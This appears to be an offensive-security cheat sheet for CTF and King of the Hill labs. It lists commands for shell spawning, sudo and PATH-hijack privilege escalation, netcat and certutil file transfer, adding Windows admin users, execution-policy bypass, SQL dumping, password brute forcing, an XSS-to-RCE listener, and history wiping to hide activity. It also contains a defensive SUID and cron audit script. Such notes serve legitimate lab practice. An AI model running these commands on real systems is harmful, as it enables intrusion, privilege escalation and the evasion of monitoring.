# Linux

### Stabilize Shell

1. ctrl+z
2. stty raw -echo
3. fg (press enter x2)
4. export TERM=xterm, for using the `clear` command

### Spawn bash

* /usr/bin/script -qc /bin/bash /dev/null
* python -c 'import pty;pty.spawn("/bin/bash")'
* python3 -c 'import pty;pty.spawn("/bin/bash")'

### Vulnerable sudo version

`sudo -u#-1 whoami`

### Execute as different user

`sudo -u `

### FTP

Connect to ftp on the machine

`ftp user `

Download files recursively

`wget -r ftp://user:pass@/`

### SMB Shares

#### SmbClient

* `smbclient -L \\\\\\` accessing a share anonymously
* `smbclient \\\\10.10.209.122\\ -U ` accessing a share with an authorized user

#### Smbmap

* `smbmap -u -p -H `

#### Smbget

* `smbget -R smb:///`

### NFS shares

* `showmount -e ` This lists the nfs shares
* `mount -t nfs :/ ` Mounting that share

### Cronjobs

* cronjobs for specific users are stored in `/var/spool/cron/cronjobs/`
* `crontab -u -e ` Check cronjobs for a specific user
* `crontab -l` cronjobs for the current user
* `cat /etc/crontab` system wide cronjobs

### Finding Binaries

* `find . -perm /4000` (set-user-id bit, SUID)
* `find . -perm /2000` (set-group-id bit, SGID)

### Finding File capabilities

`getcap -r / 2>/dev/null`

### Finding text in files

`grep -rnw '/path/to/somewhere/' -e 'pattern'`

### Changing file attributes

* chattr +i filename `making file immutable`
* chattr -i filename `making file mutable`
* lsattr filename `checking file attributes`

### Uploading Files

* scp file/you/want `user@ip`:/path/to/store
* python -m SimpleHTTPServer [port] `by default will listen on 8000`
* python3 -m http.server [port] `by default will listen on 8000`
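The SUID/SGID, file-capability and cron checks in the sections above are one-shot enumeration commands. On the defending side the same checks are worth running on a schedule and diffing against a known-good baseline, so that a newly planted setuid binary, an added capability or a world-writable cron script shows up as soon as it appears. The script below is an added example and is not part of the original notes; the default baseline file name `privesc.baseline` and the cron directories it scans by default are assumptions made for this example.

```shell
#!/bin/bash
# Added example (not part of the original notes): scheduled baseline-and-diff
# audit of the privilege-escalation surface enumerated above (SUID/SGID files,
# file capabilities, world-writable cron files).
# Usage:  bash privesc_audit.sh <root-dir> [baseline-file]
# The first run records the baseline; later runs print only what is new.
# The default baseline name and the cron paths are assumptions for this example.

# SUID/SGID files under a root directory (same find as above, both bits at once).
# One absolute path per line, sorted so the result can be diffed with comm(1).
privesc_surface() {
    find "$1" -xdev -type f -perm /6000 2>/dev/null | sort
}

# Files carrying Linux file capabilities (skipped when getcap is not installed).
file_capabilities() {
    command -v getcap >/dev/null 2>&1 || return 0
    getcap -r "$1" 2>/dev/null | sort
}

# World-writable files in cron locations: a script that root runs from cron but
# that any user can edit is the classic cron-based escalation. Defaults to the
# system cron directories when no paths are given.
writable_cron_files() {
    [ "$#" -gt 0 ] || set -- /etc/crontab /etc/cron.d /etc/cron.hourly /etc/cron.daily /var/spool/cron
    find "$@" -type f -perm -0002 2>/dev/null | sort
}

# Compare a sorted current listing with the saved baseline.
# Returns 0 when nothing new appeared, 1 (and prints the new lines) otherwise.
# A missing baseline is recorded and treated as "nothing new".
audit_against_baseline() {
    local baseline="$1" current="$2" new_entries
    if [ ! -f "$baseline" ]; then
        cp "$current" "$baseline"
        echo "baseline recorded in $baseline"
        return 0
    fi
    new_entries=$(comm -13 "$baseline" "$current")
    if [ -n "$new_entries" ]; then
        printf 'NEW privileged entries since baseline:\n%s\n' "$new_entries"
        return 1
    fi
    echo "no change against $baseline"
    return 0
}

# Full run over a root directory: collect the three listings into one sorted,
# tagged snapshot and diff it against the baseline file.
run_audit() {
    local root="$1" baseline="${2:-privesc.baseline}" snapshot status
    snapshot=$(mktemp)
    {
        privesc_surface "$root"   | sed 's/^/suid-sgid /'
        file_capabilities "$root" | sed 's/^/capability /'
        writable_cron_files       | sed 's/^/writable-cron /'
    } | sort > "$snapshot"
    # guarded call so a "new entries" result does not abort a script run with set -e
    if audit_against_baseline "$baseline" "$snapshot"; then status=0; else status=1; fi
    rm -f "$snapshot"
    return "$status"
}

# Only run when invoked with a root directory, so the functions can also be sourced.
if [ "$#" -ge 1 ]; then
    run_audit "$@"
fi
```

Run it once from cron or a config-management job to record the baseline, then alert on a non-zero exit status; every new entry it prints is either an intended change worth adding to the baseline or something to investigate.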
### Downloading Files

`wget http://:port/`

### Netcat to download files from target

* `nc -l -p [port] > file` Receive file
* `nc -w 3 [ip] [port] < file` Send file

### Cracking Zip Archive

`fcrackzip -u -D -p `

### Decrypting PGP key

If you have an `asc` key which can be used for PGP authentication then:

* gpg2john key.asc > asc_hash
* john asc_hash --wordlist=path_to_wordlist

#### Having pgp cli

* pgp --import key.asc
* pgp --decrypt file.pgp

#### Having gpg cli

* gpg --import key.asc
* gpg --decrypt file.pgp

### Killing a running job in the same shell

Find its job number with `jobs`, then kill it by that number:

```
$ jobs
[1]+  Running                 sleep 100 &
$ kill %1
[1]+  Terminated              sleep 100
```

### SSH Port Forwarding

`ssh -L :localhost: @`

### Binary Exploits

If a binary runs a certain command, for example `date`, without an absolute path, we can create our own binary of that name containing `/bin/bash`, put its directory first in PATH, and it gets executed instead:

`export PATH=/:$PATH`

# Windows

### Adding User

net user "USER_NAME" "PASS" /add

### Changing User's password

net user "USER_NAME" "NEWPASS"

### Adding User to Administrators

net localgroup administrators "USER_NAME" /add

### Changing File Permissions

CACLS files /e /p {USERNAME}:{PERMISSION}
Permissions:

1. R `Read`
2. W `Write`
3. C `Change`
4. F `Full Control`

### Set File bits

* attrib +r filename `add read only bit`
* attrib -r filename `remove read only bit`
* attrib +h filename `add hidden bit`
* attrib -h filename `remove hidden bit`

### Show hidden file/folder

* dir /a `show all hidden files & folders`
* dir /a:d `show only hidden folders`
* dir /a:h `show only hidden files`

### Downloading Files

* `certutil.exe -urlcache -f http://:/ output.exe`
* `powershell -c "wget http://:/" -outfile output.exe`
* `powershell Invoke-WebRequest -Uri $ip -OutFile $filepath`

### Active Directory

`powershell -ep bypass` load a powershell shell with execution policy bypassed
`. .\PowerView.ps1` import the PowerView module

### List Drives

`wmic logicaldisk get caption`

### Decrypting PSCredential Object

* $file = Import-Clixml -Path 
* $file.GetNetworkCredential().username
* $file.GetNetworkCredential().password

# Msfvenom

### List All Payloads

msfvenom -l payloads

### List Payload Formats

msfvenom --list formats

# Meterpreter

### Adding user for RDP

run getgui -u [USER_NAME] -p [PASS]

# Git

### Dumping repository

`./gitdumper.sh `

### Extracting information from repository

`./extractor.sh `

# Wordpress

Using wpscan we can find users or do some further enumeration of the wordpress version:

* `wpscan -e --url `

To bruteforce passwords:

* `wpscan --url -U user_file_path -P password_file_path`

# Web

### XSS to RCE

```
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim:
```

### SQL Map

`sqlmap -r request.txt --dbms=mysql --dump`

### Wfuzz

`wfuzz -c -z file,wordlist.txt --hh=0 http:////?date=FUZZ`

### API (Application Programming Interface)

* Check whether there is a v1 of the API; an older version is likely to be vulnerable to LFI
* Use wfuzz, which is a tool to fuzz for API end points or for parameters

`wfuzz -u http://:/\?FUZZ\=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404`

Here `api-endpoint` can be for example `/api/v1/resources/books\?FUZZ\=.bash_history`. The "?" comes before the parameter, FUZZ tells wfuzz where to substitute candidate parameter names, and `.bash_history` is the file we are looking for as an example.

### Web Shell Bash

`bash -c ""`

# Wordlists

### Directory Bruteforcing

* /usr/share/wordlists/dirb/big.txt
* /usr/share/wordlists/dirb/common.txt
* /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

### Gobuster

* `gobuster dir -u http:/// -w `
* `gobuster dir -u http:/// -w -s "204,301,302,307,401,403"` (use status codes if the web server is configured to respond 200 to every GET request)

### Feroxbuster

`feroxbuster -u http:/// -w `

### Dirsearch

`python3 dirsearch.py -u http:/// -w `

### Credential Bruteforcing

* /usr/share/wordlists/rockyou.txt
* /usr/share/wordlists/fasttrack.txt
* using `crackstation`
* using `seclists`

# Generating Wordlists for directory brute force

### Cewl

This spiders the given url, finds keywords and makes a wordlist from its findings

`cewl.rb `

# King Of The Hill (KoTH)

### Monitoring and Closing Shell (Linux)

* strace `debugging / tamper with processes`
* gdb `c/c++ debugger`
* script - records terminal activities
* w / who `check current pts, terminal device`
* ps -t pts/pts-number `process monitoring`
* script /dev/pts/pts-number `monitor terminal`
* cat /dev/urandom > /dev/pts/pts-number 2>/dev/null `prints arbitrary text on terminal`
* pkill -9 -t pts/pts-number

### Change SSH port

`nano /etc/ssh/sshd_config` (change Port 22 to any port you want; you can also tinker with the rest of the configuration file)

`service sshd restart` (Restart the SSH service to apply changes)

### Hide yourself from "w" or "who"

`ssh user@ip -T` This -T has some limitations, in that you cannot run bash and some other commands, but it is helpful.

### Run Bash script on king.txt

`while [ 1 ]; do /root/chattr -i king.txt; done &`

### Send messages to logged in users

* echo "msg" > /dev/pts/pts-number `send message to specific user`
* wall msg `broadcast message to everyone`

### Closing Session (Windows)

* quser
* logoff id|user_name

`export HISTFILE=/dev/null` found this, it might help you out a little when doing KOTH; it basically stops bash logging your commands in the ~/.bash_history file

* sudo ifconfig tun0 down
* sudo ip link set tun0 down
* sudo ip link delete tun0
* sudo systemctl restart systemd-networkd ; sudo systemctl status systemd-networkd